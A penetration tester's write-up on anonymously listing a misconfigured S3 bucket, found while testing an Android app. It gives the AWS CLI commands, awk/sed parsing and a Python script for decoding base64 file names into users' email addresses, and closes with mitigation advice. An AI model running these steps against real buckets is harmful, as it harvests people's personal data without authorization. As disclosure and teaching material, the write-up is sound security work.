Exploiting an S3 bucket misconfiguration to dump users' emails

This page is a writeup of how a misconfigured Amazon S3 bucket was found publicly leaking users' email addresses and other documents.

While pentesting an Android application, I came across an S3 bucket URL that was storing users' documents. The first thing that came to mind was to check whether this bucket was misconfigured, because if it was, I would get complete access to the users' documents.

I won't cover how I found this S3 bucket while pentesting the app, because my main focus is on how applications designed these days lack security considerations and how developers use insecure methods to store data.

Checking if the bucket is misconfigured

I'll be using the AWS CLI because it gives better control over the commands while enumerating buckets and other AWS infrastructure, rather than depending on third-party tools.

Installing the AWS CLI

$ sudo apt install python3 python3-pip -y
$ pip3 install awscli

Verify Installation

$ aws --version
aws-cli/1.27.45 Python/3.10.6 Linux/5.15.0-57-generic botocore/1.29.45

Checking if the bucket is accessible anonymously

To interact with the bucket, we first need its name, which can be found in the URL. The URL is usually in the following format:

https://bucket-name.s3.amazonaws.com/
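Pulling the bucket name out of a URL is easy to script when an app exposes many of them. A minimal Python sketch, assuming only the two common S3 URL styles: the virtual-hosted style shown above (including regional hosts such as bucket-name.s3.us-east-1.amazonaws.com) and the path style https://s3.amazonaws.com/bucket-name/. The function name bucket_from_url is hypothetical, and other forms (for example static website endpoints) are not handled.

```python
from typing import Optional
from urllib.parse import urlparse


def bucket_from_url(url: str) -> Optional[str]:
    """Return the bucket name from an S3 URL, or None if it doesn't look like one."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    # Virtual-hosted style: https://bucket-name.s3[.region].amazonaws.com/key
    # rsplit keeps bucket names that themselves contain dots intact
    if ".s3." in host and host.endswith(".amazonaws.com"):
        return host.rsplit(".s3.", 1)[0]
    # Path style: https://s3[.region].amazonaws.com/bucket-name/key
    if host.startswith("s3.") and host.endswith(".amazonaws.com"):
        first_segment = parsed.path.lstrip("/").split("/", 1)[0]
        return first_segment or None
    return None
```

For example, bucket_from_url("https://s3.amazonaws.com/bucket-name/uploads/x.jpeg") returns "bucket-name".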

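Check whether the bucket is publicly accessible using the AWS CLI. The --no-sign-request flag sends the request without any credentials, i.e. as an anonymous user: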

$ aws s3 ls s3://bucket-name --no-sign-request 
                           PRE admin/
                           PRE bi/
                           PRE blog/
                           PRE campanhas/
                           PRE css/
                           PRE data/
                           PRE escolas/
                           PRE fonts/
                           PRE front-assets/
                           PRE front-cache/
                           PRE img/
                           PRE lib/
                           PRE lps/
                           PRE marketing/
                           PRE XXXXXXX-tech/
                           PRE ms-qrcode/
                           PRE outros/
                           PRE parcerias/
                           PRE plugins/
                           PRE pwa/
                           PRE redirects/
                           PRE removals/
                           PRE sales/
                           PRE study-plans/
                           PRE styles/
                           PRE tech-blog/
                           PRE tutoriais/
                           PRE uploads/
                           PRE video/
                           PRE wiris-service/
2019-10-29 02:36:17        404 favicon.ico
2022-12-01 00:38:53         96 robots.txt
2022-11-02 20:44:17      59383 sitemap.xml

The bucket is publicly accessible!

We could enumerate the bucket by going through every directory, but in this writeup I'll focus only on dumping users' email IDs, which is possible because of an insecure application design.

We can also check whether a bucket is publicly accessible by simply visiting its root URL in a browser. However, some buckets are misconfigured to allow access to users with any AWS account, which a browser request can't test. With the AWS CLI we can repeat the request signed with our own AWS account by dropping --no-sign-request.
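When a bucket allows anonymous listing, visiting its root URL returns a ListBucketResult XML document instead of an error page, with up to 1,000 keys per response. A minimal sketch for reading the object keys out of that response with Python's standard library follows; the SAMPLE document is a trimmed, hypothetical response modeled on the listing above, not captured output, and the helper names are illustrative.

```python
import xml.etree.ElementTree as ET

# Namespace used by S3 ListBucketResult responses
S3_NS = {"s3": "http://s3.amazonaws.com/doc/2006-03-01/"}


def keys_from_listing(xml_text: str) -> list[str]:
    """Return the object keys contained in a ListBucketResult XML document."""
    root = ET.fromstring(xml_text)
    return [key.text for key in root.findall("s3:Contents/s3:Key", S3_NS)]


def is_truncated(xml_text: str) -> bool:
    """True if the response says more keys are available on a further page."""
    root = ET.fromstring(xml_text)
    return root.findtext("s3:IsTruncated", default="false", namespaces=S3_NS) == "true"


# Hypothetical, trimmed response for illustration only
SAMPLE = """<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>bucket-name</Name>
  <IsTruncated>false</IsTruncated>
  <Contents><Key>favicon.ico</Key><Size>404</Size></Contents>
  <Contents><Key>robots.txt</Key><Size>96</Size></Contents>
</ListBucketResult>"""

if __name__ == "__main__":
    print(keys_from_listing(SAMPLE))
    print("more pages:", is_truncated(SAMPLE))
```

If is_truncated() reports true, the remaining keys have to be fetched page by page; the AWS CLI's s3 ls handles that paging automatically.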

Enumerating Through Directories and Dumping File Names

We could go through every directory looking for juicy information, but from the Android app pentest I already knew where to find users' information: all user-uploaded documents are stored in the uploads/essay_submission/essay directory of the S3 bucket.

Now I'll list all the files inside uploads/essay_submission/essay and save the output to a text file.

aws s3 ls s3://bucket-name/uploads/essay_submission/essay/ --no-sign-request > submitted_essays.txt

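Note the / at the end of essay: to list the contents of a directory in the bucket, the path must end with a forward slash. Without it, the CLI lists matching entries at the parent level (such as PRE essay/) instead of the directory's contents.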
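S3 has no real directories: keys are flat strings, and the CLI builds the "directory" view by listing with a prefix and a / delimiter. The simplified model below (a hypothetical helper, not the CLI's actual code) shows why the trailing slash matters; the essay_old/ key is made up for illustration.

```python
def list_prefix(keys: list[str], prefix: str, delimiter: str = "/") -> tuple[list[str], list[str]]:
    """Simplified model of an S3 listing with a prefix and a delimiter.

    Returns (common_prefixes, objects). Keys that continue past the next
    delimiter after the prefix are rolled up into one "PRE" entry.
    """
    common_prefixes: set[str] = set()
    objects: list[str] = []
    for key in keys:
        if not key.startswith(prefix):
            continue
        rest = key[len(prefix):]
        if delimiter in rest:
            # Roll up everything after the next delimiter, like "PRE essay/"
            common_prefixes.add(prefix + rest.split(delimiter, 1)[0] + delimiter)
        else:
            objects.append(key)
    return sorted(common_prefixes), objects


keys = [
    "uploads/essay_submission/essay/a.jpeg",
    "uploads/essay_submission/essay/b.jpeg",
    "uploads/essay_submission/essay_old/c.jpeg",  # hypothetical sibling prefix
]
# Without the slash: only "directory" entries come back, no files
print(list_prefix(keys, "uploads/essay_submission/essay"))
# With the slash: the files inside essay/ are listed
print(list_prefix(keys, "uploads/essay_submission/essay/"))
```

Without the slash, the prefix also matches essay_old/, which is why the CLI shows rolled-up entries instead of the files.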

Let's tail the listing (tail submitted_essays.txt) to see how the files are stored and analyze their names.

The design flaw lies in how the documents/images are stored in the bucket. Every file name is base64 encoded, and analyzing the output shows that decoding a name reveals the uploader's email ID. An attacker who can list the bucket can therefore extract email IDs straight from the file names.
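A hedged reconstruction of the kind of naming scheme involved. The app's exact scheme isn't known; this sketch assumes a name of the form base64(email + ID) plus an extension, which is consistent with the decoding script later in this writeup stripping a 13-character ID. The function names, email, and ID are hypothetical. The point is that base64 is an encoding, not encryption, so anyone who can list the bucket can reverse it without any key.

```python
import base64


def make_object_name(email: str, upload_id: str, ext: str = "jpeg") -> str:
    """Hypothetical insecure naming scheme: base64(email + id) + extension."""
    encoded = base64.b64encode((email + upload_id).encode("utf-8")).decode("ascii")
    return f"{encoded}.{ext}"


def recover_email(object_name: str, id_length: int = 13) -> str:
    """Reverse the scheme: strip the extension, decode, drop the trailing ID."""
    encoded = object_name.split(".", 1)[0]
    decoded = base64.b64decode(encoded).decode("utf-8")
    return decoded[:-id_length]


name = make_object_name("alice@example.com", "1667412345678")  # made-up values
print(name)
print(recover_email(name))
```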

Extracting User Info from Dumped Data

We use the awk and sed command-line tools to extract only the base64-encoded part of each name:

tail submitted_essays.txt | awk '{print $4}' | sed 's/[.].*$//'

awk prints only the fourth column (the file name), and sed removes everything from the first dot onward, getting rid of the .jpeg extension.
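For readers who prefer to stay in Python, a rough equivalent of the awk/sed pipeline. It assumes the default aws s3 ls output format (date, time, size, key) and, like awk '{print $4}', breaks on keys that contain spaces. One difference: PRE lines, for which awk would print an empty line, are skipped. The function name encoded_names is hypothetical.

```python
def encoded_names(ls_lines) -> list[str]:
    """Mimic `awk '{print $4}' | sed 's/[.].*$//'` on `aws s3 ls` output lines."""
    names = []
    for line in ls_lines:
        fields = line.split()
        # Object lines look like: DATE TIME SIZE KEY; "PRE dir/" lines have two fields
        if len(fields) < 4:
            continue
        # Keep everything before the first dot, dropping the extension
        names.append(fields[3].split(".", 1)[0])
    return names
```

Usage: with open("submitted_essays.txt") as f: print(encoded_names(f)[-10:])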

Now let's extract the base64-encoded data from the whole listing and store it in another file, base64data.txt:

cat submitted_essays.txt | awk '{print $4}' | sed 's/[.].*$//' > base64data.txt

Decoding base64 Data Line by Line

I won't use the base64 command-line utility to decode the data, because I prefer Python for tasks like this and can reuse the script in the future.

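from base64 import b64decode
from binascii import Error as Base64Error
from os.path import isfile

# Length of the ID appended to each email before encoding (13 characters in this bucket)
ID_LENGTH = 13


def get_file_lines(file_path: str) -> list[str]:
    """Read a file and return its non-empty lines with whitespace stripped."""
    assert isfile(file_path), f"File Not Found: {file_path}"

    with open(file_path, 'r') as f:
        return [line.strip() for line in f if line.strip()]


def decode_base64_list(file_lines: list[str]) -> list[str]:
    """Decode each base64 line to text, skipping names that aren't valid base64/UTF-8."""
    decoded_lines = []
    for line in file_lines:
        try:
            decoded_lines.append(b64decode(line).decode('utf-8'))
        except (Base64Error, UnicodeDecodeError):
            print(f"Skipping undecodable name: {line}")

    return decoded_lines


def write_file(file_path: str, file_lines: list[str]):
    with open(file_path, 'w') as f:
        # one entry per line, each newline-terminated so `wc -l` counts every entry
        f.writelines(line + '\n' for line in file_lines)


def main(file_path: str, save_file_path: str):
    encoded_file_lines = get_file_lines(file_path)
    # de-duplicate names before decoding
    decoded_file_lines = decode_base64_list(sorted(set(encoded_file_lines)))

    # sanitizing data
    ## remove the trailing IDs, then de-duplicate again: one user can have several
    ## uploads whose names differ only in the ID
    sanitized_lines = sorted({line[:-ID_LENGTH] for line in decoded_file_lines
                              if len(line) > ID_LENGTH})

    ## write unique values to file
    write_file(save_file_path, sanitized_lines)

    # print some data on completion
    print(sanitized_lines[:4])


if __name__ == '__main__':
    file_path = 'base64data.txt'
    decoded_file_path = 'user_data.txt'

    main(file_path, decoded_file_path)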

Save the script as decode_data.py and run it:

python3 decode_data.py

After the script runs successfully, it prints the first few decoded entries to the screen.
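The script assumes standard base64 with = padding. If another target encodes names with the URL-safe alphabet (- and _ instead of + and /) or strips the padding, b64decode may raise binascii.Error or, because it silently discards non-alphabet characters by default, return garbage. A hedged helper for that case, assuming that a - or _ in a name means the URL-safe alphabet was used; decode_name is a hypothetical name, not part of the original script.

```python
import base64
import binascii
from typing import Optional


def decode_name(name: str) -> Optional[str]:
    """Decode a base64 name that may use the URL-safe alphabet or lack '=' padding.

    Returns None if the name isn't valid base64 or doesn't decode to UTF-8 text.
    """
    # Restore padding: valid base64 length is a multiple of 4
    padded = name + "=" * (-len(name) % 4)
    try:
        if "-" in padded or "_" in padded:
            # URL-safe alphabet uses '-' and '_' in place of '+' and '/'
            raw = base64.urlsafe_b64decode(padded)
        else:
            # validate=True rejects characters outside the standard alphabet
            raw = base64.b64decode(padded, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
```

It can replace the b64decode(line).decode('utf-8') call in decode_base64_list, with None results skipped.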

We now have the email addresses of all users who have uploaded documents.

tail user_data.txt
wc -l user_data.txt
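wc -l counts lines, not users, so any blank or malformed line inflates the count. A small sketch that counts only unique, email-shaped entries and groups them by domain; the regex is deliberately loose and is an assumption, not a full email validator, and summarize is a hypothetical helper name.

```python
import re
from collections import Counter

# Deliberately loose pattern: something@something.tld with no whitespace
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def summarize(lines):
    """Return (sorted unique email-shaped entries, per-domain counts)."""
    emails = sorted({line.strip() for line in lines if EMAIL_RE.match(line.strip())})
    domains = Counter(email.rsplit("@", 1)[1].lower() for email in emails)
    return emails, domains
```

Usage: with open("user_data.txt") as f: emails, domains = summarize(f); print(len(emails), domains.most_common(5))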

How to mitigate the issue and develop better applications

  • User data was exposed to the public because of a misconfigured bucket. Buckets shouldn't be publicly accessible; use presigned URLs that expire after a limited time to grant access to individual bucket objects.

  • It's not secure to build object names from users' details or other uniquely identifiable IDs (base64 is an encoding, not encryption). Developers should instead use UUIDs or salted hashes to generate names for assets/objects.
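A minimal sketch of the second recommendation, assuming the app keeps a database row that links each user to their uploads: object keys are generated with uuid4, so the key itself reveals nothing about the uploader. The helper name new_object_key and its default prefix are hypothetical.

```python
import uuid


def new_object_key(ext: str, prefix: str = "uploads/essay_submission/essay/") -> str:
    """Random, non-identifying object key; the user-to-key link lives in the database."""
    # uuid4 is random, so the key can't be decoded back to an email or user ID
    return f"{prefix}{uuid.uuid4()}.{ext}"
```

The application then stores the (user, key) pair and, for the first recommendation, hands out short-lived links instead of public ones; with boto3 that is the S3 client's generate_presigned_url("get_object", Params={"Bucket": ..., "Key": key}, ExpiresIn=300), where ExpiresIn is in seconds.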
